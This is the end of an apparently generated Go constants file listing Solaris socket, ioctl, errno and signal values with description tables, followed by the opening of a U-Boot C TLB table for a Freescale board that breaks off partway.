RTM_FREEADDR = 0x10
RTM_GET = 0x4
RTM_IFINFO = 0xe
RTM_LOCK = 0x8
RTM_LOSING = 0x5
RTM_MISS = 0x7
RTM_NEWADDR = 0xc
RTM_OLDADD = 0x9
RTM_OLDDEL = 0xa
RTM_REDIRECT = 0x6
RTM_RESOLVE = 0xb
RTM_VERSION = 0x3
RTV_EXPIRE = 0x4
RTV_HOPCOUNT = 0x2
RTV_MTU = 0x1
RTV_RPIPE = 0x8
RTV_RTT = 0x40
RTV_RTTVAR = 0x80
RTV_SPIPE = 0x10
RTV_SSTHRESH = 0x20
RT_AWARE = 0x1
RUSAGE_CHILDREN = -0x1
RUSAGE_SELF = 0x0
SCM_RIGHTS = 0x1010
SCM_TIMESTAMP = 0x1013
SCM_UCRED = 0x1012
SHUT_RD = 0x0
SHUT_RDWR = 0x2
SHUT_WR = 0x1
SIG2STR_MAX = 0x20
SIOCADDMULTI = -0x7fdf96cf
SIOCADDRT = -0x7fcf8df6
SIOCATMARK = 0x40047307
SIOCDARP = -0x7fdb96e0
SIOCDELMULTI = -0x7fdf96ce
SIOCDELRT = -0x7fcf8df5
SIOCDXARP = -0x7fff9658
SIOCGARP = -0x3fdb96e1
SIOCGDSTINFO = -0x3fff965c
SIOCGENADDR = -0x3fdf96ab
SIOCGENPSTATS = -0x3fdf96c7
SIOCGETLSGCNT = -0x3fef8deb
SIOCGETNAME = 0x40107334
SIOCGETPEER = 0x40107335
SIOCGETPROP = -0x3fff8f44
SIOCGETSGCNT = -0x3feb8deb
SIOCGETSYNC = -0x3fdf96d3
SIOCGETVIFCNT = -0x3feb8dec
SIOCGHIWAT = 0x40047301
SIOCGIFADDR = -0x3fdf96f3
SIOCGIFBRDADDR = -0x3fdf96e9
SIOCGIFCONF = -0x3ff796a4
SIOCGIFDSTADDR = -0x3fdf96f1
SIOCGIFFLAGS = -0x3fdf96ef
SIOCGIFHWADDR = -0x3fdf9647
SIOCGIFINDEX = -0x3fdf96a6
SIOCGIFMEM = -0x3fdf96ed
SIOCGIFMETRIC = -0x3fdf96e5
SIOCGIFMTU = -0x3fdf96ea
SIOCGIFMUXID = -0x3fdf96a8
SIOCGIFNETMASK = -0x3fdf96e7
SIOCGIFNUM = 0x40046957
SIOCGIP6ADDRPOLICY = -0x3fff965e
SIOCGIPMSFILTER = -0x3ffb964c
SIOCGLIFADDR = -0x3f87968f
SIOCGLIFBINDING = -0x3f879666
SIOCGLIFBRDADDR = -0x3f879685
SIOCGLIFCONF = -0x3fef965b
SIOCGLIFDADSTATE = -0x3f879642
SIOCGLIFDSTADDR = -0x3f87968d
SIOCGLIFFLAGS = -0x3f87968b
SIOCGLIFGROUPINFO = -0x3f4b9663
SIOCGLIFGROUPNAME = -0x3f879664
SIOCGLIFHWADDR = -0x3f879640
SIOCGLIFINDEX = -0x3f87967b
SIOCGLIFLNKINFO = -0x3f879674
SIOCGLIFMETRIC = -0x3f879681
SIOCGLIFMTU = -0x3f879686
SIOCGLIFMUXID = -0x3f87967d
SIOCGLIFNETMASK = -0x3f879683
SIOCGLIFNUM = -0x3ff3967e
SIOCGLIFSRCOF = -0x3fef964f
SIOCGLIFSUBNET = -0x3f879676
SIOCGLIFTOKEN = -0x3f879678
SIOCGLIFUSESRC = -0x3f879651
SIOCGLIFZONE = -0x3f879656
SIOCGLOWAT = 0x40047303
SIOCGMSFILTER = -0x3ffb964e
SIOCGPGRP = 0x40047309
SIOCGSTAMP = -0x3fef9646
SIOCGXARP = -0x3fff9659
SIOCIFDETACH = -0x7fdf96c8
SIOCILB = -0x3ffb9645
SIOCLIFADDIF = -0x3f879691
SIOCLIFDELND = -0x7f879673
SIOCLIFGETND = -0x3f879672
SIOCLIFREMOVEIF = -0x7f879692
SIOCLIFSETND = -0x7f879671
SIOCLOWER = -0x7fdf96d7
SIOCSARP = -0x7fdb96e2
SIOCSCTPGOPT = -0x3fef9653
SIOCSCTPPEELOFF = -0x3ffb9652
SIOCSCTPSOPT = -0x7fef9654
SIOCSENABLESDP = -0x3ffb9649
SIOCSETPROP = -0x7ffb8f43
SIOCSETSYNC = -0x7fdf96d4
SIOCSHIWAT = -0x7ffb8d00
SIOCSIFADDR = -0x7fdf96f4
SIOCSIFBRDADDR = -0x7fdf96e8
SIOCSIFDSTADDR = -0x7fdf96f2
SIOCSIFFLAGS = -0x7fdf96f0
SIOCSIFINDEX = -0x7fdf96a5
SIOCSIFMEM = -0x7fdf96ee
SIOCSIFMETRIC = -0x7fdf96e4
SIOCSIFMTU = -0x7fdf96eb
SIOCSIFMUXID = -0x7fdf96a7
SIOCSIFNAME = -0x7fdf96b7
SIOCSIFNETMASK = -0x7fdf96e6
SIOCSIP6ADDRPOLICY = -0x7fff965d
SIOCSIPMSFILTER = -0x7ffb964b
SIOCSLGETREQ = -0x3fdf96b9
SIOCSLIFADDR = -0x7f879690
SIOCSLIFBRDADDR = -0x7f879684
SIOCSLIFDSTADDR = -0x7f87968e
SIOCSLIFFLAGS = -0x7f87968c
SIOCSLIFGROUPNAME = -0x7f879665
SIOCSLIFINDEX = -0x7f87967a
SIOCSLIFLNKINFO = -0x7f879675
SIOCSLIFMETRIC = -0x7f879680
SIOCSLIFMTU = -0x7f879687
SIOCSLIFMUXID = -0x7f87967c
SIOCSLIFNAME = -0x3f87967f
SIOCSLIFNETMASK = -0x7f879682
SIOCSLIFPREFIX = -0x3f879641
SIOCSLIFSUBNET = -0x7f879677
SIOCSLIFTOKEN = -0x7f879679
SIOCSLIFUSESRC = -0x7f879650
SIOCSLIFZONE = -0x7f879655
SIOCSLOWAT = -0x7ffb8cfe
SIOCSLSTAT = -0x7fdf96b8
SIOCSMSFILTER = -0x7ffb964d
SIOCSPGRP = -0x7ffb8cf8
SIOCSPROMISC = -0x7ffb96d0
SIOCSQPTR = -0x3ffb9648
SIOCSSDSTATS = -0x3fdf96d2
SIOCSSESTATS = -0x3fdf96d1
SIOCSXARP = -0x7fff965a
SIOCTMYADDR = -0x3ff79670
SIOCTMYSITE = -0x3ff7966e
SIOCTONLINK = -0x3ff7966f
SIOCUPPER = -0x7fdf96d8
SIOCX25RCV = -0x3fdf96c4
SIOCX25TBL = -0x3fdf96c3
SIOCX25XMT = -0x3fdf96c5
SIOCXPROTO = 0x20007337
SOCK_CLOEXEC = 0x80000
SOCK_DGRAM = 0x1
SOCK_NDELAY = 0x200000
SOCK_NONBLOCK = 0x100000
SOCK_RAW = 0x4
SOCK_RDM = 0x5
SOCK_SEQPACKET = 0x6
SOCK_STREAM = 0x2
SOCK_TYPE_MASK = 0xffff
SOL_FILTER = 0xfffc
SOL_PACKET = 0xfffd
SOL_ROUTE = 0xfffe
SOL_SOCKET = 0xffff
SOMAXCONN = 0x80
SO_ACCEPTCONN = 0x2
SO_ALL = 0x3f
SO_ALLZONES = 0x1014
SO_ANON_MLP = 0x100a
SO_ATTACH_FILTER = 0x40000001
SO_BAND = 0x4000
SO_BROADCAST = 0x20
SO_COPYOPT = 0x80000
SO_DEBUG = 0x1
SO_DELIM = 0x8000
SO_DETACH_FILTER = 0x40000002
SO_DGRAM_ERRIND = 0x200
SO_DOMAIN = 0x100c
SO_DONTLINGER = -0x81
SO_DONTROUTE = 0x10
SO_ERROPT = 0x40000
SO_ERROR = 0x1007
SO_EXCLBIND = 0x1015
SO_HIWAT = 0x10
SO_ISNTTY = 0x800
SO_ISTTY = 0x400
SO_KEEPALIVE = 0x8
SO_LINGER = 0x80
SO_LOWAT = 0x20
SO_MAC_EXEMPT = 0x100b
SO_MAC_IMPLICIT = 0x1016
SO_MAXBLK = 0x100000
SO_MAXPSZ = 0x8
SO_MINPSZ = 0x4
SO_MREADOFF = 0x80
SO_MREADON = 0x40
SO_NDELOFF = 0x200
SO_NDELON = 0x100
SO_NODELIM = 0x10000
SO_OOBINLINE = 0x100
SO_PROTOTYPE = 0x1009
SO_RCVBUF = 0x1002
SO_RCVLOWAT = 0x1004
SO_RCVPSH = 0x100d
SO_RCVTIMEO = 0x1006
SO_READOPT = 0x1
SO_RECVUCRED = 0x400
SO_REUSEADDR = 0x4
SO_SECATTR = 0x1011
SO_SNDBUF = 0x1001
SO_SNDLOWAT = 0x1003
SO_SNDTIMEO = 0x1005
SO_STRHOLD = 0x20000
SO_TAIL = 0x200000
SO_TIMESTAMP = 0x1013
SO_TONSTOP = 0x2000
SO_TOSTOP = 0x1000
SO_TYPE = 0x1008
SO_USELOOPBACK = 0x40
SO_VRRP = 0x1017
SO_WROFF = 0x2
S_ENFMT = 0x400
S_IAMB = 0x1ff
S_IEXEC = 0x40
S_IFBLK = 0x6000
S_IFCHR = 0x2000
S_IFDIR = 0x4000
S_IFDOOR = 0xd000
S_IFIFO = 0x1000
S_IFLNK = 0xa000
S_IFMT = 0xf000
S_IFNAM = 0x5000
S_IFPORT = 0xe000
S_IFREG = 0x8000
S_IFSOCK = 0xc000
S_INSEM = 0x1
S_INSHD = 0x2
S_IREAD = 0x100
S_IRGRP = 0x20
S_IROTH = 0x4
S_IRUSR = 0x100
S_IRWXG = 0x38
S_IRWXO = 0x7
S_IRWXU = 0x1c0
S_ISGID = 0x400
S_ISUID = 0x800
S_ISVTX = 0x200
S_IWGRP = 0x10
S_IWOTH = 0x2
S_IWRITE = 0x80
S_IWUSR = 0x80
S_IXGRP = 0x8
S_IXOTH = 0x1
S_IXUSR = 0x40
TAB0 = 0x0
TAB1 = 0x800
TAB2 = 0x1000
TAB3 = 0x1800
TABDLY = 0x1800
TCFLSH = 0x5407
TCGETA = 0x5401
TCGETS = 0x540d
TCIFLUSH = 0x0
TCIOFF = 0x2
TCIOFLUSH = 0x2
TCION = 0x3
TCOFLUSH = 0x1
TCOOFF = 0x0
TCOON = 0x1
TCP_ABORT_THRESHOLD = 0x11
TCP_ANONPRIVBIND = 0x20
TCP_CONN_ABORT_THRESHOLD = 0x13
TCP_CONN_NOTIFY_THRESHOLD = 0x12
TCP_CORK = 0x18
TCP_EXCLBIND = 0x21
TCP_INIT_CWND = 0x15
TCP_KEEPALIVE = 0x8
TCP_KEEPALIVE_ABORT_THRESHOLD = 0x17
TCP_KEEPALIVE_THRESHOLD = 0x16
TCP_KEEPCNT = 0x23
TCP_KEEPIDLE = 0x22
TCP_KEEPINTVL = 0x24
TCP_LINGER2 = 0x1c
TCP_MAXSEG = 0x2
TCP_MSS = 0x218
TCP_NODELAY = 0x1
TCP_NOTIFY_THRESHOLD = 0x10
TCP_RECVDSTADDR = 0x14
TCP_RTO_INITIAL = 0x19
TCP_RTO_MAX = 0x1b
TCP_RTO_MIN = 0x1a
TCSAFLUSH = 0x5410
TCSBRK = 0x5405
TCSETA = 0x5402
TCSETAF = 0x5404
TCSETAW = 0x5403
TCSETS = 0x540e
TCSETSF = 0x5410
TCSETSW = 0x540f
TCXONC = 0x5406
TIOC = 0x5400
TIOCCBRK = 0x747a
TIOCCDTR = 0x7478
TIOCCILOOP = 0x746c
TIOCEXCL = 0x740d
TIOCFLUSH = 0x7410
TIOCGETC = 0x7412
TIOCGETD = 0x7400
TIOCGETP = 0x7408
TIOCGLTC = 0x7474
TIOCGPGRP = 0x7414
TIOCGPPS = 0x547d
TIOCGPPSEV = 0x547f
TIOCGSID = 0x7416
TIOCGSOFTCAR = 0x5469
TIOCGWINSZ = 0x5468
TIOCHPCL = 0x7402
TIOCKBOF = 0x5409
TIOCKBON = 0x5408
TIOCLBIC = 0x747e
TIOCLBIS = 0x747f
TIOCLGET = 0x747c
TIOCLSET = 0x747d
TIOCMBIC = 0x741c
TIOCMBIS = 0x741b
TIOCMGET = 0x741d
TIOCMSET = 0x741a
TIOCM_CAR = 0x40
TIOCM_CD = 0x40
TIOCM_CTS = 0x20
TIOCM_DSR = 0x100
TIOCM_DTR = 0x2
TIOCM_LE = 0x1
TIOCM_RI = 0x80
TIOCM_RNG = 0x80
TIOCM_RTS = 0x4
TIOCM_SR = 0x10
TIOCM_ST = 0x8
TIOCNOTTY = 0x7471
TIOCNXCL = 0x740e
TIOCOUTQ = 0x7473
TIOCREMOTE = 0x741e
TIOCSBRK = 0x747b
TIOCSCTTY = 0x7484
TIOCSDTR = 0x7479
TIOCSETC = 0x7411
TIOCSETD = 0x7401
TIOCSETN = 0x740a
TIOCSETP = 0x7409
TIOCSIGNAL = 0x741f
TIOCSILOOP = 0x746d
TIOCSLTC = 0x7475
TIOCSPGRP = 0x7415
TIOCSPPS = 0x547e
TIOCSSOFTCAR = 0x546a
TIOCSTART = 0x746e
TIOCSTI = 0x7417
TIOCSTOP = 0x746f
TIOCSWINSZ = 0x5467
TOSTOP = 0x100
UTIME_NOW = -0x1
UTIME_OMIT = -0x2
VCEOF = 0x8
VCEOL = 0x9
VDISCARD = 0xd
VDSUSP = 0xb
VEOF = 0x4
VEOL = 0x5
VEOL2 = 0x6
VERASE = 0x2
VERASE2 = 0x11
VINTR = 0x0
VKILL = 0x3
VLNEXT = 0xf
VMIN = 0x4
VQUIT = 0x1
VREPRINT = 0xc
VSTART = 0x8
VSTATUS = 0x10
VSTOP = 0x9
VSUSP = 0xa
VSWTCH = 0x7
VT0 = 0x0
VT1 = 0x4000
VTDLY = 0x4000
VTIME = 0x5
VWERASE = 0xe
WCONTFLG = 0xffff
WCONTINUED = 0x8
WCOREFLG = 0x80
WEXITED = 0x1
WNOHANG = 0x40
WNOWAIT = 0x80
WOPTMASK = 0xcf
WRAP = 0x20000
WSIGMASK = 0x7f
WSTOPFLG = 0x7f
WSTOPPED = 0x4
WTRAPPED = 0x2
WUNTRACED = 0x4
XCASE = 0x4
XTABS = 0x1800
)
// Errors
const (
E2BIG = syscall.Errno(0x7)
EACCES = syscall.Errno(0xd)
EADDRINUSE = syscall.Errno(0x7d)
EADDRNOTAVAIL = syscall.Errno(0x7e)
EADV = syscall.Errno(0x44)
EAFNOSUPPORT = syscall.Errno(0x7c)
EAGAIN = syscall.Errno(0xb)
EALREADY = syscall.Errno(0x95)
EBADE = syscall.Errno(0x32)
EBADF = syscall.Errno(0x9)
EBADFD = syscall.Errno(0x51)
EBADMSG = syscall.Errno(0x4d)
EBADR = syscall.Errno(0x33)
EBADRQC = syscall.Errno(0x36)
EBADSLT = syscall.Errno(0x37)
EBFONT = syscall.Errno(0x39)
EBUSY = syscall.Errno(0x10)
ECANCELED = syscall.Errno(0x2f)
ECHILD = syscall.Errno(0xa)
ECHRNG = syscall.Errno(0x25)
ECOMM = syscall.Errno(0x46)
ECONNABORTED = syscall.Errno(0x82)
ECONNREFUSED = syscall.Errno(0x92)
ECONNRESET = syscall.Errno(0x83)
EDEADLK = syscall.Errno(0x2d)
EDEADLOCK = syscall.Errno(0x38)
EDESTADDRREQ = syscall.Errno(0x60)
EDOM = syscall.Errno(0x21)
EDQUOT = syscall.Errno(0x31)
EEXIST = syscall.Errno(0x11)
EFAULT = syscall.Errno(0xe)
EFBIG = syscall.Errno(0x1b)
EHOSTDOWN = syscall.Errno(0x93)
EHOSTUNREACH = syscall.Errno(0x94)
EIDRM = syscall.Errno(0x24)
EILSEQ = syscall.Errno(0x58)
EINPROGRESS = syscall.Errno(0x96)
EINTR = syscall.Errno(0x4)
EINVAL = syscall.Errno(0x16)
EIO = syscall.Errno(0x5)
EISCONN = syscall.Errno(0x85)
EISDIR = syscall.Errno(0x15)
EL2HLT = syscall.Errno(0x2c)
EL2NSYNC = syscall.Errno(0x26)
EL3HLT = syscall.Errno(0x27)
EL3RST = syscall.Errno(0x28)
ELIBACC = syscall.Errno(0x53)
ELIBBAD = syscall.Errno(0x54)
ELIBEXEC = syscall.Errno(0x57)
ELIBMAX = syscall.Errno(0x56)
ELIBSCN = syscall.Errno(0x55)
ELNRNG = syscall.Errno(0x29)
ELOCKUNMAPPED = syscall.Errno(0x48)
ELOOP = syscall.Errno(0x5a)
EMFILE = syscall.Errno(0x18)
EMLINK = syscall.Errno(0x1f)
EMSGSIZE = syscall.Errno(0x61)
EMULTIHOP = syscall.Errno(0x4a)
ENAMETOOLONG = syscall.Errno(0x4e)
ENETDOWN = syscall.Errno(0x7f)
ENETRESET = syscall.Errno(0x81)
ENETUNREACH = syscall.Errno(0x80)
ENFILE = syscall.Errno(0x17)
ENOANO = syscall.Errno(0x35)
ENOBUFS = syscall.Errno(0x84)
ENOCSI = syscall.Errno(0x2b)
ENODATA = syscall.Errno(0x3d)
ENODEV = syscall.Errno(0x13)
ENOENT = syscall.Errno(0x2)
ENOEXEC = syscall.Errno(0x8)
ENOLCK = syscall.Errno(0x2e)
ENOLINK = syscall.Errno(0x43)
ENOMEM = syscall.Errno(0xc)
ENOMSG = syscall.Errno(0x23)
ENONET = syscall.Errno(0x40)
ENOPKG = syscall.Errno(0x41)
ENOPROTOOPT = syscall.Errno(0x63)
ENOSPC = syscall.Errno(0x1c)
ENOSR = syscall.Errno(0x3f)
ENOSTR = syscall.Errno(0x3c)
ENOSYS = syscall.Errno(0x59)
ENOTACTIVE = syscall.Errno(0x49)
ENOTBLK = syscall.Errno(0xf)
ENOTCONN = syscall.Errno(0x86)
ENOTDIR = syscall.Errno(0x14)
ENOTEMPTY = syscall.Errno(0x5d)
ENOTRECOVERABLE = syscall.Errno(0x3b)
ENOTSOCK = syscall.Errno(0x5f)
ENOTSUP = syscall.Errno(0x30)
ENOTTY = syscall.Errno(0x19)
ENOTUNIQ = syscall.Errno(0x50)
ENXIO = syscall.Errno(0x6)
EOPNOTSUPP = syscall.Errno(0x7a)
EOVERFLOW = syscall.Errno(0x4f)
EOWNERDEAD = syscall.Errno(0x3a)
EPERM = syscall.Errno(0x1)
EPFNOSUPPORT = syscall.Errno(0x7b)
EPIPE = syscall.Errno(0x20)
EPROTO = syscall.Errno(0x47)
EPROTONOSUPPORT = syscall.Errno(0x78)
EPROTOTYPE = syscall.Errno(0x62)
ERANGE = syscall.Errno(0x22)
EREMCHG = syscall.Errno(0x52)
EREMOTE = syscall.Errno(0x42)
ERESTART = syscall.Errno(0x5b)
EROFS = syscall.Errno(0x1e)
ESHUTDOWN = syscall.Errno(0x8f)
ESOCKTNOSUPPORT = syscall.Errno(0x79)
ESPIPE = syscall.Errno(0x1d)
ESRCH = syscall.Errno(0x3)
ESRMNT = syscall.Errno(0x45)
ESTALE = syscall.Errno(0x97)
ESTRPIPE = syscall.Errno(0x5c)
ETIME = syscall.Errno(0x3e)
ETIMEDOUT = syscall.Errno(0x91)
ETOOMANYREFS = syscall.Errno(0x90)
ETXTBSY = syscall.Errno(0x1a)
EUNATCH = syscall.Errno(0x2a)
EUSERS = syscall.Errno(0x5e)
EWOULDBLOCK = syscall.Errno(0xb)
EXDEV = syscall.Errno(0x12)
EXFULL = syscall.Errno(0x34)
)
// Signals
const (
SIGABRT = syscall.Signal(0x6)
SIGALRM = syscall.Signal(0xe)
SIGBUS = syscall.Signal(0xa)
SIGCANCEL = syscall.Signal(0x24)
SIGCHLD = syscall.Signal(0x12)
SIGCLD = syscall.Signal(0x12)
SIGCONT = syscall.Signal(0x19)
SIGEMT = syscall.Signal(0x7)
SIGFPE = syscall.Signal(0x8)
SIGFREEZE = syscall.Signal(0x22)
SIGHUP = syscall.Signal(0x1)
SIGILL = syscall.Signal(0x4)
SIGINFO = syscall.Signal(0x29)
SIGINT = syscall.Signal(0x2)
SIGIO = syscall.Signal(0x16)
SIGIOT = syscall.Signal(0x6)
SIGJVM1 = syscall.Signal(0x27)
SIGJVM2 = syscall.Signal(0x28)
SIGKILL = syscall.Signal(0x9)
SIGLOST = syscall.Signal(0x25)
SIGLWP = syscall.Signal(0x21)
SIGPIPE = syscall.Signal(0xd)
SIGPOLL = syscall.Signal(0x16)
SIGPROF = syscall.Signal(0x1d)
SIGPWR = syscall.Signal(0x13)
SIGQUIT = syscall.Signal(0x3)
SIGSEGV = syscall.Signal(0xb)
SIGSTOP = syscall.Signal(0x17)
SIGSYS = syscall.Signal(0xc)
SIGTERM = syscall.Signal(0xf)
SIGTHAW = syscall.Signal(0x23)
SIGTRAP = syscall.Signal(0x5)
SIGTSTP = syscall.Signal(0x18)
SIGTTIN = syscall.Signal(0x1a)
SIGTTOU = syscall.Signal(0x1b)
SIGURG = syscall.Signal(0x15)
SIGUSR1 = syscall.Signal(0x10)
SIGUSR2 = syscall.Signal(0x11)
SIGVTALRM = syscall.Signal(0x1c)
SIGWAITING = syscall.Signal(0x20)
SIGWINCH = syscall.Signal(0x14)
SIGXCPU = syscall.Signal(0x1e)
SIGXFSZ = syscall.Signal(0x1f)
SIGXRES = syscall.Signal(0x26)
)
// Error table
var errorList = [...]struct {
num syscall.Errno
name string
desc string
}{
{1, "EPERM", "not owner"},
{2, "ENOENT", "no such file or directory"},
{3, "ESRCH", "no such process"},
{4, "EINTR", "interrupted system call"},
{5, "EIO", "I/O error"},
{6, "ENXIO", "no such device or address"},
{7, "E2BIG", "arg list too long"},
{8, "ENOEXEC", "exec format error"},
{9, "EBADF", "bad file number"},
{10, "ECHILD", "no child processes"},
{11, "EAGAIN", "resource temporarily unavailable"},
{12, "ENOMEM", "not enough space"},
{13, "EACCES", "permission denied"},
{14, "EFAULT", "bad address"},
{15, "ENOTBLK", "block device required"},
{16, "EBUSY", "device busy"},
{17, "EEXIST", "file exists"},
{18, "EXDEV", "cross-device link"},
{19, "ENODEV", "no such device"},
{20, "ENOTDIR", "not a directory"},
{21, "EISDIR", "is a directory"},
{22, "EINVAL", "invalid argument"},
{23, "ENFILE", "file table overflow"},
{24, "EMFILE", "too many open files"},
{25, "ENOTTY", "inappropriate ioctl for device"},
{26, "ETXTBSY", "text file busy"},
{27, "EFBIG", "file too large"},
{28, "ENOSPC", "no space left on device"},
{29, "ESPIPE", "illegal seek"},
{30, "EROFS", "read-only file system"},
{31, "EMLINK", "too many links"},
{32, "EPIPE", "broken pipe"},
{33, "EDOM", "argument out of domain"},
{34, "ERANGE", "result too large"},
{35, "ENOMSG", "no message of desired type"},
{36, "EIDRM", "identifier removed"},
{37, "ECHRNG", "channel number out of range"},
{38, "EL2NSYNC", "level 2 not synchronized"},
{39, "EL3HLT", "level 3 halted"},
{40, "EL3RST", "level 3 reset"},
{41, "ELNRNG", "link number out of range"},
{42, "EUNATCH", "protocol driver not attached"},
{43, "ENOCSI", "no CSI structure available"},
{44, "EL2HLT", "level 2 halted"},
{45, "EDEADLK", "deadlock situation detected/avoided"},
{46, "ENOLCK", "no record locks available"},
{47, "ECANCELED", "operation canceled"},
{48, "ENOTSUP", "operation not supported"},
{49, "EDQUOT", "disc quota exceeded"},
{50, "EBADE", "bad exchange descriptor"},
{51, "EBADR", "bad request descriptor"},
{52, "EXFULL", "message tables full"},
{53, "ENOANO", "anode table overflow"},
{54, "EBADRQC", "bad request code"},
{55, "EBADSLT", "invalid slot"},
{56, "EDEADLOCK", "file locking deadlock"},
{57, "EBFONT", "bad font file format"},
{58, "EOWNERDEAD", "owner of the lock died"},
{59, "ENOTRECOVERABLE", "lock is not recoverable"},
{60, "ENOSTR", "not a stream device"},
{61, "ENODATA", "no data available"},
{62, "ETIME", "timer expired"},
{63, "ENOSR", "out of stream resources"},
{64, "ENONET", "machine is not on the network"},
{65, "ENOPKG", "package not installed"},
{66, "EREMOTE", "object is remote"},
{67, "ENOLINK", "link has been severed"},
{68, "EADV", "advertise error"},
{69, "ESRMNT", "srmount error"},
{70, "ECOMM", "communication error on send"},
{71, "EPROTO", "protocol error"},
{72, "ELOCKUNMAPPED", "locked lock was unmapped "},
{73, "ENOTACTIVE", "facility is not active"},
{74, "EMULTIHOP", "multihop attempted"},
{77, "EBADMSG", "not a data message"},
{78, "ENAMETOOLONG", "file name too long"},
{79, "EOVERFLOW", "value too large for defined data type"},
{80, "ENOTUNIQ", "name not unique on network"},
{81, "EBADFD", "file descriptor in bad state"},
{82, "EREMCHG", "remote address changed"},
{83, "ELIBACC", "can not access a needed shared library"},
{84, "ELIBBAD", "accessing a corrupted shared library"},
{85, "ELIBSCN", ".lib section in a.out corrupted"},
{86, "ELIBMAX", "attempting to link in more shared libraries than system limit"},
{87, "ELIBEXEC", "can not exec a shared library directly"},
{88, "EILSEQ", "illegal byte sequence"},
{89, "ENOSYS", "operation not applicable"},
{90, "ELOOP", "number of symbolic links encountered during path name traversal exceeds MAXSYMLINKS"},
{91, "ERESTART", "error 91"},
{92, "ESTRPIPE", "error 92"},
{93, "ENOTEMPTY", "directory not empty"},
{94, "EUSERS", "too many users"},
{95, "ENOTSOCK", "socket operation on non-socket"},
{96, "EDESTADDRREQ", "destination address required"},
{97, "EMSGSIZE", "message too long"},
{98, "EPROTOTYPE", "protocol wrong type for socket"},
{99, "ENOPROTOOPT", "option not supported by protocol"},
{120, "EPROTONOSUPPORT", "protocol not supported"},
{121, "ESOCKTNOSUPPORT", "socket type not supported"},
{122, "EOPNOTSUPP", "operation not supported on transport endpoint"},
{123, "EPFNOSUPPORT", "protocol family not supported"},
{124, "EAFNOSUPPORT", "address family not supported by protocol family"},
{125, "EADDRINUSE", "address already in use"},
{126, "EADDRNOTAVAIL", "cannot assign requested address"},
{127, "ENETDOWN", "network is down"},
{128, "ENETUNREACH", "network is unreachable"},
{129, "ENETRESET", "network dropped connection because of reset"},
{130, "ECONNABORTED", "software caused connection abort"},
{131, "ECONNRESET", "connection reset by peer"},
{132, "ENOBUFS", "no buffer space available"},
{133, "EISCONN", "transport endpoint is already connected"},
{134, "ENOTCONN", "transport endpoint is not connected"},
{143, "ESHUTDOWN", "cannot send after socket shutdown"},
{144, "ETOOMANYREFS", "too many references: cannot splice"},
{145, "ETIMEDOUT", "connection timed out"},
{146, "ECONNREFUSED", "connection refused"},
{147, "EHOSTDOWN", "host is down"},
{148, "EHOSTUNREACH", "no route to host"},
{149, "EALREADY", "operation already in progress"},
{150, "EINPROGRESS", "operation now in progress"},
{151, "ESTALE", "stale NFS file handle"},
}
// Signal table
var signalList = [...]struct {
num syscall.Signal
name string
desc string
}{
{1, "SIGHUP", "hangup"},
{2, "SIGINT", "interrupt"},
{3, "SIGQUIT", "quit"},
{4, "SIGILL", "illegal Instruction"},
{5, "SIGTRAP", "trace/Breakpoint Trap"},
{6, "SIGABRT", "abort"},
{7, "SIGEMT", "emulation Trap"},
{8, "SIGFPE", "arithmetic Exception"},
{9, "SIGKILL", "killed"},
{10, "SIGBUS", "bus Error"},
{11, "SIGSEGV", "segmentation Fault"},
{12, "SIGSYS", "bad System Call"},
{13, "SIGPIPE", "broken Pipe"},
{14, "SIGALRM", "alarm Clock"},
{15, "SIGTERM", "terminated"},
{16, "SIGUSR1", "user Signal 1"},
{17, "SIGUSR2", "user Signal 2"},
{18, "SIGCHLD", "child Status Changed"},
{19, "SIGPWR", "power-Fail/Restart"},
{20, "SIGWINCH", "window Size Change"},
{21, "SIGURG", "urgent Socket Condition"},
{22, "SIGIO", "pollable Event"},
{23, "SIGSTOP", "stopped (signal)"},
{24, "SIGTSTP", "stopped (user)"},
{25, "SIGCONT", "continued"},
{26, "SIGTTIN", "stopped (tty input)"},
{27, "SIGTTOU", "stopped (tty output)"},
{28, "SIGVTALRM", "virtual Timer Expired"},
{29, "SIGPROF", "profiling Timer Expired"},
{30, "SIGXCPU", "cpu Limit Exceeded"},
{31, "SIGXFSZ", "file Size Limit Exceeded"},
{32, "SIGWAITING", "no runnable lwp"},
{33, "SIGLWP", "inter-lwp signal"},
{34, "SIGFREEZE", "checkpoint Freeze"},
{35, "SIGTHAW", "checkpoint Thaw"},
{36, "SIGCANCEL", "thread Cancellation"},
{37, "SIGLOST", "resource Lost"},
{38, "SIGXRES", "resource Control Exceeded"},
{39, "SIGJVM1", "reserved for JVM 1"},
{40, "SIGJVM2", "reserved for JVM 2"},
{41, "SIGINFO", "information Request"},
}
| {
"pile_set_name": "Github"
} |
// SPDX-License-Identifier: GPL-2.0+
/*
* Copyright 2014 Freescale Semiconductor, Inc.
*/
#include <common.h>
#include <asm/mmu.h>
struct fsl_e_tlb_entry tlb_table[] = {
/* TLB 0 - for temp stack in cache */
SET_TLB_ENTRY(0, CONFIG_SYS_INIT_RAM_ADDR,
CONFIG_SYS_INIT_RAM_ADDR_PHYS,
MAS3_SX|MAS3_SW|MAS3_SR, 0,
0, 0, BOOKE_PAGESZ_4K, 0),
SET_TLB_ENTRY(0, CONFIG_SYS_INIT_RAM_ADDR + 4 * 1024,
CONFIG_SYS_INIT_RAM_ADDR_PHYS + 4 * 1024,
MAS3_SX|MAS3_SW|MAS3_SR, 0,
0, 0, BOOKE_PAGESZ_4K, 0),
SET_TLB_ENTRY(0, CONFIG_SYS_INIT_RAM_ADDR + 8 * 1024,
CONFIG_SYS_INIT_RAM_ADDR_PHYS + 8 * 1024,
MAS3_SX|MAS3_SW|MAS3_SR, 0,
0, 0, BOOKE_PAGESZ_4K, 0),
SET_TLB_ENTRY(0, CONFIG_SYS_INIT_RAM_ADDR + 12 * 1024,
CONFIG_SYS_INIT_RAM_ADDR_PHYS + 12 * 1024,
MAS3_SX|MAS3_SW|MAS3_SR, 0,
0, 0, BOOKE_PAGESZ_4K, 0),
/* TLB 1 */
/* *I*** - Covers boot page */
#if defined(CONFIG_SYS_RAMBOOT) && defined(CONFIG_SYS_INIT_L3_ADDR)
/*
* *I*G - L3SRAM. When L3 is used as 256K SRAM, the address of the
* SRAM is at 0xfffc0000, it covered the 0xfffff000.
*/
SET_TLB_ENTRY(1, CONFIG_SYS_INIT_L3_ADDR, CONFIG_SYS_INIT_L3_ADDR,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_I|MAS2_G,
0, 0, BOOKE_PAGESZ_256K, 1),
#else
SET_TLB_ENTRY(1, 0xfffff000, 0xfffff000,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_I|MAS2_G,
0, 0, BOOKE_PAGESZ_4K, 1),
#endif
/* *I*G* - CCSRBAR */
